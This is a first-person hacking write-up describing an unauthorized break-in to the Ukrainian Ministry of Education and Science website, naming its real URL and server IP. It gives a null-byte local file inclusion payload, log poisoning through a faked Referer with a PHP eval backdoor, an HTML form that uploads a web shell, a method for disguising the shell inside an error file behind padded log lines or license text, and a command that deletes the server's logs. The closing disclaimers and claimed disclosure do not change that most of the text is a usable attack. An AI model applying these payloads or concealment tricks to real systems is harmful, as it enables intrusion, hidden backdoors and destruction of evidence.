GOV sites are on the spot: hacking the web site of Ministry of Education and Science of Ukraine

Lately, I see more and more vulnerable government web sites. And the reason
is banal: government web sites are charged to be written by non-professionals,
or the website is not being moderated and support team does not check emails,
etc. Security audit is considered as some kind of luxury service when, in fact,
it is a necessity as well as the key to success of website users.

The purpose of this hack is not getting some profit or benefit from the
uploaded shell. I want to show how vulnerable the highest level web sites can be.
It would seem that protecting them should be the #1 task, because it’s not
difficult to imagine what entails hacking the government web site. What if I
break into the LAN and get the access to the server which stores some secret
information, such as external independent testing results (in case of MES web
site)? What then? The authenticity of those certificates which are required by
every institution of higher education can be called into question at the moment?
Relax. I haven’t done that, but reported all found errors and bugs to the
government web site support.

Picking out a victim

Dunno how it goes in your case, but as for me, it is easier to search for
vulnerabilities while listening to some nice music. I’ve found the Disturbed -
Perfect Insanity in my playlist and opened the mighty Google. Try to type in the
"міністерство" and see neither more nor less than 15400000 results. Just open
the first link and enter the web site of the Ministry of Education and Science
of Ukraine.

The first thing that strikes the eye is the "Official web site, 2004"
inscription, but all web site news are fresh at the time. "Long time no update"
- I thought. Thinking of that, I put the mouse on the menu while browsing the
status bar. All links were like http://site/dir. The mode_rewrite function could
be turned on. After clicking the link I’ve found the following address in the
bar: http://www.mon.gov.ua/main.php?query=zno. I also tried to find the path by
changing the "query" parameter to "query []", but it was far from it and the bug
was far to be discovered. Although, the web site layout had clearly gone bad.
Either the error report output was just simply turned off, or there was no
vulnerability down here. I just felt that vulnerability should definitely exist
somewhere here, so I decided to check the RFI availability but got no results
again.

Well, we can try to find the path to the root server as my scanner did not
find the phpinfo. The first you need is to make sure that this is a real Local
File Include and is it possible to cut the file extension using the null-byte. I
just tried to include the vulnerable file:

http://www.mon.gov.ua/main.php?query=main.php%00

I got the page opened an infinite number of times, forming a pyramid as a
result. This means that the vulnerability really exists, but we cannot say for
sure whether it is remote or local include.

Here's another example of not only the LFI but the Looped DoS. Such query can
just easily "drop" the web site. I had quickly stopped downloading the page and
began substituting the symbols of “cd” command into the current query. The path
was picked up at the third attempt. I think you understood how much "../"
symbols the query should contain?

Forbbiden: analyzing the situation

It became really easy to upload a shell after someone smart enough got a
point in using the /proc/self/environ! You just have to send a POST-request with
a fake User-Agen and that’s it. So, now we’ll try:

http://www.mon.gov.ua/main.php?query=../../../proc/self/environ%00

Damn… got nothing. But there are apache logs! So, let’s try...

main.php?query=../../../proc/self/fd/2%00

And what happens?

[Sun Nov 15 07:41:42 2009] [error] [client 92.249.112.225] client
denied by server configuration: /usr/share/phpMyAdmin/
[Sun Nov 15 08:43:31 2009] [error] [client 65.55.109.220] client denied by
server configuration: /usr/share/phpMyAdmin/phpAdsNew, referer:
http://xxxx.us/album/thumbnails.php?album=search&search=releases

The whole apache log is like that. You might think - "Hmm, it doesn’t quite
look like an access”. And that’s correct, because here we have the “403 –
Forbbiden” errors only. User-Agent is not written to this log, but the Referrer
is. Nevertheless, it can be faked just as easy as User-Agent. The main thing is
to find a page which would show us the cherished 403 error. By reviewing the log,
it becomes clear that we deal with phpMyAdmin. Now, after checking that by
opening the http://www.mon.gov.ua/phpMyAdmin we can get any server answer we
need. Let’s write a simple PHP script for Referrer imitation:

<?php
$server = '212.111.193.189';
$dir = '/phpMyAdmin/';
$evilcode = '<?php eval($_REQUEST[ev]); ?>';

?>

You can use some existing automated program (e.g. InetCrack, HttpREQ from
[x26] VOLAND, or just dispense with some FireFox plug-in) if you're too lazy to
write that script.

Uploading the shell

Once we have sent the request it must be inscribed in the log. Since we
replaced the referrer, the log should be like:

[Xxx Xxx xx xx:xx:xx 2009] [error] [client xx.xx.xx.xx] client denied
by server configuration: /usr/share/phpMyAdmin/ , referer: <?php eval($_REQUEST[ev]);
?>

Consequently, our code should be executed when loading the log through a
vulnerable script. Let’s check it through the browser:


http://www.mon.gov.ua/main.php?query=../../../proc/self/fd/2%00&ev=ls+la

We did it, so we can see the directory list now. I was trying to upload the
shell with such famous software as wget, get, links, lynx, but it always failed.
Html-form shell uploading option realization attempt:

<form action="http://www.mon.gov.ua/main.php?query=../../../proc/self/fd/2%00&ev=copy($_FILES[file][tmp_name],
$_GET[aa]);&aa=./mon.php" method="post" enctype="multipart/form-data">
<input type="file" name="file"><br>
<input type="submit" value="Загрузить"><br>
</form>

Now I just simply upload the shell from my computer, enter the web shell page
and enter the password (do not forget to set unique passwords for your shells).
After reviewing the files list I saw 2 empty files named like “error.php” and “error”.
That’s a wonderful opportunity to hide our shell. I take the same errors log and
insert it into the file beginning. Now it approximately looks like this:

<?php/*
[Mon Nov 16 11:14:07 2009] [error] [client ::1] client denied by server
configuration: /usr/share/phpMyAdmin/
[Mon Nov 16 11:14:08 2009] [error] [client ::1] client denied by server
configuration: /usr/share/phpMyAdmin/
[Mon Nov 16 11:14:14 2009] [error] [client ::1] client denied by server
configuration: /usr/share/phpMyAdmin/
[Mon Nov 16 11:14:15 2009] [error] [client ::1] client denied by server
configuration: /usr/share/phpMyAdmin/
[Mon Nov 16 11:14:18 2009] [error] [client ::1] client denied by server
configuration: /usr/share/phpMyAdmin/
...
* / Many carriage returns?>
<?PHP
//Authentication
$login = ""; //Login
$pass = ""; //Pass
... ?>

I think I don’t need to explain that the line from the log file should be
repeated for many times. This method is frequently used, so take a note when
you’ll be searching for some shell. The file beginning can also be embedded with
the text of web site CMS copyrights or licenses. Usually, after admin sees the
GNU license he closes the file with no hesitation and that’s exactly what we
need.

Don’t forget to remove log files. Thank God I had all appropriate rights for
that and I did the "rm-rf/var/log/httpd/".

Conclusion

Web site hacking is restricted and punishable by law, so I’d recommend you
not to do that. Be "white" and smart if you still have decided to hack some web
site and inform the web site administrator about those vulnerabilities you had
found in one’s system (as I did right away).

WARNING

Warning! The information is presented strictly in the interest of education!
Neither the author nor editors are not responsible for any actions you might
undertake!